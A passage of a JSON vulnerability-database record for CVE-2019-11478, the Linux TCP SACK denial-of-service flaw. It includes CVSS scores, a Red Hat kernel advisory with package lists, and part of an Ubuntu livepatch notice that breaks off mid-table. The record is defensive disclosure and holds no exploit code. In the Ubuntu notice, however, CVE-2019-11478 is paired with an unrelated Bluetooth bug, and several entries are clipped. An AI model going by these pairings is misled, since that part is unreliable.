        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153424"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2019-11478",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-11478",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-143128",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security@ubuntu.com",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-11478",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-11478",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "security@ubuntu.com",
            "id": "CVE-2019-11478",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201906-682",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-143128",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143128"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jonathan Looney discovered that the TCP retransmission queue implementation in tcp_fragment in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit f070ef2ac66716357066b683fb0baf55f8191a2e. Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels. Linux Kernel Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Linux Kernel is prone to a denial-of-service vulnerability. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2019:1488-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:1488\nIssue date:        2019-06-17\nCVE Names:         CVE-2019-3896 CVE-2019-11477 CVE-2019-11478\n                   CVE-2019-11479\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. While processing SACK segments, the Linux kernel\u0027s socket buffer\n(SKB) data structure becomes fragmented. Each fragment is about TCP maximum\nsegment size (MSS) bytes. To efficiently process SACK blocks, the Linux\nkernel merges multiple fragmented SKBs into one, potentially overflowing\nthe variable holding the number of segments. A remote attacker could use\nthis flaw to crash the Linux kernel by sending a crafted sequence of SACK\nsegments on a TCP connection with small value of TCP MSS, resulting in a\ndenial of service (DoS). (CVE-2019-11477)\n\n* kernel: Double free in lib/idr.c (CVE-2019-3896)\n\n* Kernel: tcp: excessive resource consumption while processing SACK blocks\nallows remote denial of service (CVE-2019-11478)\n\n* Kernel: tcp: excessive resource consumption for TCP connections with low\nMSS allows remote denial of service (CVE-2019-11479)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* MDS mitigations not enabled on Intel Skylake CPUs (BZ#1710081)\n\n* RHEL6 kernel does not disable SMT with mds=full,nosmt (BZ#1710121)\n\n* [RHEL6] md_clear flag missing from /proc/cpuinfo (BZ#1710517)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1694812 - CVE-2019-3896 kernel: Double free in lib/idr.c\n1719123 - CVE-2019-11477 Kernel: tcp: integer overflow while processing SACK blocks allows remote denial of service\n1719128 - CVE-2019-11478 Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service\n1719129 - CVE-2019-11479 Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-754.15.3.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-headers-2.6.32-754.15.3.el6.i686.rpm\nperf-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm\nkernel-doc-2.6.32-754.15.3.el6.noarch.rpm\nkernel-firmware-2.6.32-754.15.3.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-headers-2.6.32-754.15.3.el6.x86_64.rpm\nperf-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-754.15.3.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm\nkernel-doc-2.6.32-754.15.3.el6.noarch.rpm\nkernel-firmware-2.6.32-754.15.3.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-headers-2.6.32-754.15.3.el6.x86_64.rpm\nperf-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-754.15.3.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-headers-2.6.32-754.15.3.el6.i686.rpm\nperf-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm\nkernel-doc-2.6.32-754.15.3.el6.noarch.rpm\nkernel-firmware-2.6.32-754.15.3.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debug-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-devel-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-headers-2.6.32-754.15.3.el6.ppc64.rpm\nperf-2.6.32-754.15.3.el6.ppc64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debug-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-754.15.3.el6.s390x.rpm\nkernel-devel-2.6.32-754.15.3.el6.s390x.rpm\nkernel-headers-2.6.32-754.15.3.el6.s390x.rpm\nkernel-kdump-2.6.32-754.15.3.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-754.15.3.el6.s390x.rpm\nperf-2.6.32-754.15.3.el6.s390x.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-headers-2.6.32-754.15.3.el6.x86_64.rpm\nperf-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-754.15.3.el6.ppc64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\npython-perf-2.6.32-754.15.3.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-754.15.3.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\npython-perf-2.6.32-754.15.3.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-754.15.3.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-headers-2.6.32-754.15.3.el6.i686.rpm\nperf-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm\nkernel-doc-2.6.32-754.15.3.el6.noarch.rpm\nkernel-firmware-2.6.32-754.15.3.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-headers-2.6.32-754.15.3.el6.x86_64.rpm\nperf-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-3896\nhttps://access.redhat.com/security/cve/CVE-2019-11477\nhttps://access.redhat.com/security/cve/CVE-2019-11478\nhttps://access.redhat.com/security/cve/CVE-2019-11479\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/tcpsack\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXQfbBdzjgjWX9erEAQjjiw//QtCd50n/kyijAWgyi02UAPD+QrPWRv6a\ngLSESiQGCl7YvWgt96eI5DANREmFMWQ8wB0LRku4KJ4tutBdTcyouWrHgHEYhXLB\n24ZBi8HB/L9EhxKoQlHlY68ekZzbOcjqZhrL5K2xUnoVTJDo/+d+vtJgOIlrV/PC\naXxRL5nez5Y8pjCiwqm37RP7OUnn6daLtqcu42DR9XovXqORrfJVo43+5HR0drLA\nZB2B0ERUU+iFKpS6p9qIgfMLR9KRlMikeI+NRU/1JBjEDT5C4uT4fqULjM4a4QcR\n4Cm+wN6ku7CTK8l+1RAKSAn12KMjHUfMhWT1X0XFTFl3lFifL6o6+5D0OVSM68xL\nk+E8pmoilN1nFk49Z9uLDbCJogLbPdgSOZohiuYLBfUE4IUy0OiCodmKRlQBxWTK\ntYBMbUQ1stywEGngsFAXnF7BIeC346+uvMT83TlfbhV+TNIFARjwx9ySNrV7hLes\nenTzE250yv7LaZ0tXGKhoPXfLif7nFFVNzupV1PM3uHDCjLYLRq5JQcd1IWCrBS0\nIF5A/kp1X9zV8lO4fghj3aSXA7HwQphRBEJ4FkZSu34eqUX5rrC96X5T/8T9McOK\niOKT/z03WI1mSBJUrU/x7N2v44mXr0kropqd/Yfqf6KQDJWW3aXkJJWxNMgBqiYS\nl+p3rcEBzDA=NzJu\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nKernel Live Patch Security Notice 0058-1\nOctober 22, 2019\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu:\n\n| Series           | Base kernel  | Arch     | flavors          |\n|------------------+--------------+----------+------------------|\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | aws              |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | oem              |\n| Ubuntu 18.04 LTS | 5.0.0        | amd64    | azure            |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | aws              |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | azure            |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | lowlatency       |\n\nSummary:\n\nSeveral security issues were fixed in the kernel. (CVE-2016-10905)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. (CVE-2018-20856)\n\nIt was discovered that the USB gadget Midi driver in the Linux kernel\ncontained a double-free vulnerability when handling certain error\nconditions. (CVE-2018-20961)\n\nIt was discovered that the XFS file system in the Linux kernel did not\nproperly handle mount failures in some situations. (CVE-2018-20976)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. \n(CVE-2018-21008)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel\ndid not properly validate certain Tunneled Direct Link Setup (TDLS). (CVE-2019-0136)\n\nIt was discovered that the Linux kernel on ARM processors allowed a tracing\nprocess to modify a syscall after a seccomp decision had been made on that\nsyscall. (CVE-2019-2054)\n\nIt was discovered that an integer overflow existed in the Binder\nimplementation of the Linux kernel, leading to a buffer overflow. (CVE-2019-2181)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. (CVE-2019-3846)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. (CVE-2019-11478)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly zero out memory in some situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel\ndid not properly check for allocation errors in some situations. (CVE-2019-12614)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. \n(CVE-2019-14284)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14814)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14815)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. (CVE-2019-14821)\n\nPeter Pi discovered a buffer overflow in the virtio network backend\n(vhost_net) implementation in the Linux kernel. (CVE-2019-14835)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your livepatches to the following\nversions:\n\n| Kernel                   | Version  | flavors                  |\n|--------------------------+----------+--------------------------|\n| 4.4.0-148.174            | 58.1     | lowlatency, generic      |\n| 4.4.0-148.174~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-150.176            | 58.1     | generic, lowlatency      |\n| 4.4.0-150.176~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178            | 58.1     